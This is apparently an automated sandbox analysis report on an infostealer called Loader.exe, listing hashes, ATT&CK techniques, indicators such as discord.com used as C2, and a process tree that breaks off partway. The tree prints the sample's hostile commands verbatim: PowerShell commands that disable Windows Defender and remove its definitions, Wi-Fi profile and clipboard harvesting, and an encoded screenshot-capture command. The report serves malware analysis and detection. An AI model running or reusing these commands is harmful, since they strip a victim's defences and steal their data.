348dc41dc1e75835c4c49bd5b12849966734b44c54f4f4be00a7cb9ac5455861

Resubmissions

26/03/2025, 16:44

250326-t9brya1ls3 10

26/03/2025, 16:43

250326-t8ahgsyxbv 10

Analysis

max time kernel
57s
max time network
63s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
26/03/2025, 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader/Loader.exe
Size

7.5MB
MD5

251ac55d55b47ec078473eeaa1e510e7
SHA1

1126ce753d5f4916e5e4f0fa5fa002bd7bce181b
SHA256

60bbd89cca19b257dd70d37ce4907d86e96b2711da5d945dd4204a88edad318b
SHA512

90120ff2ac2ad04758279695b43b45759829535d7b8519a2907bc2b1169a1e510a7e383e2347e7f15225de1a924bd9b77637d9c77e7838d99b062c279ae3912f
SSDEEP

196608:pWOgoiwfI9jUCH0+n4/JKIYJmg+Irj+dD1SAxw:28IHU+GJPYf9ydD1s

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5072	powershell.exe
2356	powershell.exe
5608	powershell.exe
1384	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5204	cmd.exe
4716	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2796	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe
5804	Loader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5248	tasklist.exe
2816	tasklist.exe
2956	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002b12a-21.dat	upx
behavioral2/memory/5804-25-0x00007FFEDD060000-0x00007FFEDD722000-memory.dmp	upx
behavioral2/files/0x001900000002b11d-27.dat	upx
behavioral2/memory/5804-30-0x00007FFEE0A10000-0x00007FFEE0A35000-memory.dmp	upx
behavioral2/files/0x001000000002b128-31.dat	upx
behavioral2/memory/5804-32-0x00007FFEE71B0000-0x00007FFEE71BF000-memory.dmp	upx
behavioral2/files/0x001900000002b127-34.dat	upx
behavioral2/files/0x001900000002b129-35.dat	upx
behavioral2/files/0x001900000002b12e-39.dat	upx
behavioral2/files/0x001900000002b12d-38.dat	upx
behavioral2/files/0x001900000002b12f-40.dat	upx
behavioral2/files/0x001900000002b123-47.dat	upx
behavioral2/files/0x001900000002b124-48.dat	upx
behavioral2/files/0x001900000002b122-46.dat	upx
behavioral2/files/0x001900000002b120-51.dat	upx
behavioral2/files/0x001900000002b11c-49.dat	upx
behavioral2/files/0x001900000002b121-45.dat	upx
behavioral2/files/0x001900000002b11f-43.dat	upx
behavioral2/files/0x001900000002b11e-42.dat	upx
behavioral2/memory/5804-50-0x00007FFEE7100000-0x00007FFEE7119000-memory.dmp	upx
behavioral2/memory/5804-52-0x00007FFEE09E0000-0x00007FFEE0A0C000-memory.dmp	upx
behavioral2/memory/5804-58-0x00007FFEE0930000-0x00007FFEE0954000-memory.dmp	upx
behavioral2/memory/5804-60-0x00007FFEDCEE0000-0x00007FFEDD05F000-memory.dmp	upx
behavioral2/memory/5804-64-0x00007FFEE6820000-0x00007FFEE682D000-memory.dmp	upx
behavioral2/memory/5804-63-0x00007FFEE70C0000-0x00007FFEE70D9000-memory.dmp	upx
behavioral2/memory/5804-66-0x00007FFEE08F0000-0x00007FFEE0923000-memory.dmp	upx
behavioral2/memory/5804-71-0x00007FFEDD790000-0x00007FFEDD85E000-memory.dmp	upx
behavioral2/memory/5804-74-0x00007FFEE0A10000-0x00007FFEE0A35000-memory.dmp	upx
behavioral2/memory/5804-73-0x00007FFED8E20000-0x00007FFED9353000-memory.dmp	upx
behavioral2/memory/5804-78-0x00007FFEE6210000-0x00007FFEE621D000-memory.dmp	upx
behavioral2/memory/5804-77-0x00007FFEE2EA0000-0x00007FFEE2EB4000-memory.dmp	upx
behavioral2/memory/5804-70-0x00007FFEDD060000-0x00007FFEDD722000-memory.dmp	upx
behavioral2/memory/5804-80-0x00007FFEDCDC0000-0x00007FFEDCEDA000-memory.dmp	upx
behavioral2/memory/5804-82-0x00007FFEDCEE0000-0x00007FFEDD05F000-memory.dmp	upx
behavioral2/memory/5804-81-0x00007FFEE0930000-0x00007FFEE0954000-memory.dmp	upx
behavioral2/memory/5804-162-0x00007FFEE6820000-0x00007FFEE682D000-memory.dmp	upx
behavioral2/memory/5804-184-0x00007FFEE08F0000-0x00007FFEE0923000-memory.dmp	upx
behavioral2/memory/5804-254-0x00007FFEDD790000-0x00007FFEDD85E000-memory.dmp	upx
behavioral2/memory/5804-269-0x00007FFED8E20000-0x00007FFED9353000-memory.dmp	upx
behavioral2/memory/5804-303-0x00007FFEDCDC0000-0x00007FFEDCEDA000-memory.dmp	upx
behavioral2/memory/5804-310-0x00007FFEDCEE0000-0x00007FFEDD05F000-memory.dmp	upx
behavioral2/memory/5804-304-0x00007FFEDD060000-0x00007FFEDD722000-memory.dmp	upx
behavioral2/memory/5804-305-0x00007FFEE0A10000-0x00007FFEE0A35000-memory.dmp	upx
behavioral2/memory/5804-319-0x00007FFEDD060000-0x00007FFEDD722000-memory.dmp	upx
behavioral2/memory/5804-325-0x00007FFEDCEE0000-0x00007FFEDD05F000-memory.dmp	upx
behavioral2/memory/5804-346-0x00007FFEDCDC0000-0x00007FFEDCEDA000-memory.dmp	upx
behavioral2/memory/5804-345-0x00007FFEE2EA0000-0x00007FFEE2EB4000-memory.dmp	upx
behavioral2/memory/5804-344-0x00007FFEE6210000-0x00007FFEE621D000-memory.dmp	upx
behavioral2/memory/5804-343-0x00007FFEE08F0000-0x00007FFEE0923000-memory.dmp	upx
behavioral2/memory/5804-342-0x00007FFEDD790000-0x00007FFEDD85E000-memory.dmp	upx
behavioral2/memory/5804-341-0x00007FFEE70C0000-0x00007FFEE70D9000-memory.dmp	upx
behavioral2/memory/5804-340-0x00007FFEE6820000-0x00007FFEE682D000-memory.dmp	upx
behavioral2/memory/5804-339-0x00007FFEE0930000-0x00007FFEE0954000-memory.dmp	upx
behavioral2/memory/5804-338-0x00007FFEE09E0000-0x00007FFEE0A0C000-memory.dmp	upx
behavioral2/memory/5804-337-0x00007FFEE7100000-0x00007FFEE7119000-memory.dmp	upx
behavioral2/memory/5804-336-0x00007FFEE71B0000-0x00007FFEE71BF000-memory.dmp	upx
behavioral2/memory/5804-335-0x00007FFEE0A10000-0x00007FFEE0A35000-memory.dmp	upx
behavioral2/memory/5804-334-0x00007FFED8E20000-0x00007FFED9353000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4140	cmd.exe
3444	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3092	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5812	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
5072	powershell.exe
2356	powershell.exe
5072	powershell.exe
4716	powershell.exe
2356	powershell.exe
2356	powershell.exe
4716	powershell.exe
4716	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
5608	powershell.exe
5608	powershell.exe
4384	powershell.exe
4384	powershell.exe
1384	powershell.exe
1384	powershell.exe
2172	powershell.exe
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2956	tasklist.exe
Token: SeDebugPrivilege	5248	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5380	WMIC.exe
Token: SeSecurityPrivilege	5380	WMIC.exe
Token: SeTakeOwnershipPrivilege	5380	WMIC.exe
Token: SeLoadDriverPrivilege	5380	WMIC.exe
Token: SeSystemProfilePrivilege	5380	WMIC.exe
Token: SeSystemtimePrivilege	5380	WMIC.exe
Token: SeProfSingleProcessPrivilege	5380	WMIC.exe
Token: SeIncBasePriorityPrivilege	5380	WMIC.exe
Token: SeCreatePagefilePrivilege	5380	WMIC.exe
Token: SeBackupPrivilege	5380	WMIC.exe
Token: SeRestorePrivilege	5380	WMIC.exe
Token: SeShutdownPrivilege	5380	WMIC.exe
Token: SeDebugPrivilege	5380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5380	WMIC.exe
Token: SeRemoteShutdownPrivilege	5380	WMIC.exe
Token: SeUndockPrivilege	5380	WMIC.exe
Token: SeManageVolumePrivilege	5380	WMIC.exe
Token: 33	5380	WMIC.exe
Token: 34	5380	WMIC.exe
Token: 35	5380	WMIC.exe
Token: 36	5380	WMIC.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeIncreaseQuotaPrivilege	5380	WMIC.exe
Token: SeSecurityPrivilege	5380	WMIC.exe
Token: SeTakeOwnershipPrivilege	5380	WMIC.exe
Token: SeLoadDriverPrivilege	5380	WMIC.exe
Token: SeSystemProfilePrivilege	5380	WMIC.exe
Token: SeSystemtimePrivilege	5380	WMIC.exe
Token: SeProfSingleProcessPrivilege	5380	WMIC.exe
Token: SeIncBasePriorityPrivilege	5380	WMIC.exe
Token: SeCreatePagefilePrivilege	5380	WMIC.exe
Token: SeBackupPrivilege	5380	WMIC.exe
Token: SeRestorePrivilege	5380	WMIC.exe
Token: SeShutdownPrivilege	5380	WMIC.exe
Token: SeDebugPrivilege	5380	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5380	WMIC.exe
Token: SeRemoteShutdownPrivilege	5380	WMIC.exe
Token: SeUndockPrivilege	5380	WMIC.exe
Token: SeManageVolumePrivilege	5380	WMIC.exe
Token: 33	5380	WMIC.exe
Token: 34	5380	WMIC.exe
Token: 35	5380	WMIC.exe
Token: 36	5380	WMIC.exe
Token: SeDebugPrivilege	2816	tasklist.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	5608	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeIncreaseQuotaPrivilege	1132	WMIC.exe
Token: SeSecurityPrivilege	1132	WMIC.exe
Token: SeTakeOwnershipPrivilege	1132	WMIC.exe
Token: SeLoadDriverPrivilege	1132	WMIC.exe
Token: SeSystemProfilePrivilege	1132	WMIC.exe
Token: SeSystemtimePrivilege	1132	WMIC.exe
Token: SeProfSingleProcessPrivilege	1132	WMIC.exe
Token: SeIncBasePriorityPrivilege	1132	WMIC.exe
Token: SeCreatePagefilePrivilege	1132	WMIC.exe
Token: SeBackupPrivilege	1132	WMIC.exe
Token: SeRestorePrivilege	1132	WMIC.exe
Token: SeShutdownPrivilege	1132	WMIC.exe
Token: SeDebugPrivilege	1132	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
696	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1588 wrote to memory of 5804	1588	Loader.exe	79
PID 1588 wrote to memory of 5804	1588	Loader.exe	79
PID 5804 wrote to memory of 2808	5804	Loader.exe	80
PID 5804 wrote to memory of 2808	5804	Loader.exe	80
PID 5804 wrote to memory of 2400	5804	Loader.exe	81
PID 5804 wrote to memory of 2400	5804	Loader.exe	81
PID 2808 wrote to memory of 5072	2808	cmd.exe	84
PID 2808 wrote to memory of 5072	2808	cmd.exe	84
PID 2400 wrote to memory of 2356	2400	cmd.exe	85
PID 2400 wrote to memory of 2356	2400	cmd.exe	85
PID 5804 wrote to memory of 2224	5804	Loader.exe	86
PID 5804 wrote to memory of 2224	5804	Loader.exe	86
PID 5804 wrote to memory of 1928	5804	Loader.exe	87
PID 5804 wrote to memory of 1928	5804	Loader.exe	87
PID 5804 wrote to memory of 4540	5804	Loader.exe	90
PID 5804 wrote to memory of 4540	5804	Loader.exe	90
PID 5804 wrote to memory of 5204	5804	Loader.exe	91
PID 5804 wrote to memory of 5204	5804	Loader.exe	91
PID 1928 wrote to memory of 2956	1928	cmd.exe	94
PID 1928 wrote to memory of 2956	1928	cmd.exe	94
PID 2224 wrote to memory of 5248	2224	cmd.exe	95
PID 2224 wrote to memory of 5248	2224	cmd.exe	95
PID 4540 wrote to memory of 5380	4540	cmd.exe	96
PID 4540 wrote to memory of 5380	4540	cmd.exe	96
PID 5204 wrote to memory of 4716	5204	cmd.exe	97
PID 5204 wrote to memory of 4716	5204	cmd.exe	97
PID 5804 wrote to memory of 3324	5804	Loader.exe	98
PID 5804 wrote to memory of 3324	5804	Loader.exe	98
PID 5804 wrote to memory of 3380	5804	Loader.exe	100
PID 5804 wrote to memory of 3380	5804	Loader.exe	100
PID 5804 wrote to memory of 4140	5804	Loader.exe	103
PID 5804 wrote to memory of 4140	5804	Loader.exe	103
PID 5804 wrote to memory of 2020	5804	Loader.exe	105
PID 5804 wrote to memory of 2020	5804	Loader.exe	105
PID 5804 wrote to memory of 2800	5804	Loader.exe	107
PID 5804 wrote to memory of 2800	5804	Loader.exe	107
PID 3324 wrote to memory of 2816	3324	cmd.exe	109
PID 3324 wrote to memory of 2816	3324	cmd.exe	109
PID 2020 wrote to memory of 5812	2020	cmd.exe	110
PID 2020 wrote to memory of 5812	2020	cmd.exe	110
PID 3380 wrote to memory of 3840	3380	cmd.exe	111
PID 3380 wrote to memory of 3840	3380	cmd.exe	111
PID 4140 wrote to memory of 3444	4140	cmd.exe	112
PID 4140 wrote to memory of 3444	4140	cmd.exe	112
PID 2800 wrote to memory of 5020	2800	cmd.exe	113
PID 2800 wrote to memory of 5020	2800	cmd.exe	113
PID 5804 wrote to memory of 4336	5804	Loader.exe	114
PID 5804 wrote to memory of 4336	5804	Loader.exe	114
PID 4336 wrote to memory of 1320	4336	cmd.exe	116
PID 4336 wrote to memory of 1320	4336	cmd.exe	116
PID 5804 wrote to memory of 3412	5804	Loader.exe	117
PID 5804 wrote to memory of 3412	5804	Loader.exe	117
PID 5020 wrote to memory of 5096	5020	powershell.exe	119
PID 5020 wrote to memory of 5096	5020	powershell.exe	119
PID 3412 wrote to memory of 1400	3412	cmd.exe	120
PID 3412 wrote to memory of 1400	3412	cmd.exe	120
PID 5804 wrote to memory of 5404	5804	Loader.exe	121
PID 5804 wrote to memory of 5404	5804	Loader.exe	121
PID 5404 wrote to memory of 5280	5404	cmd.exe	123
PID 5404 wrote to memory of 5280	5404	cmd.exe	123
PID 5804 wrote to memory of 3008	5804	Loader.exe	124
PID 5804 wrote to memory of 3008	5804	Loader.exe	124
PID 3008 wrote to memory of 3416	3008	cmd.exe	127
PID 3008 wrote to memory of 3416	3008	cmd.exe	127

C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1588
- C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5204
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
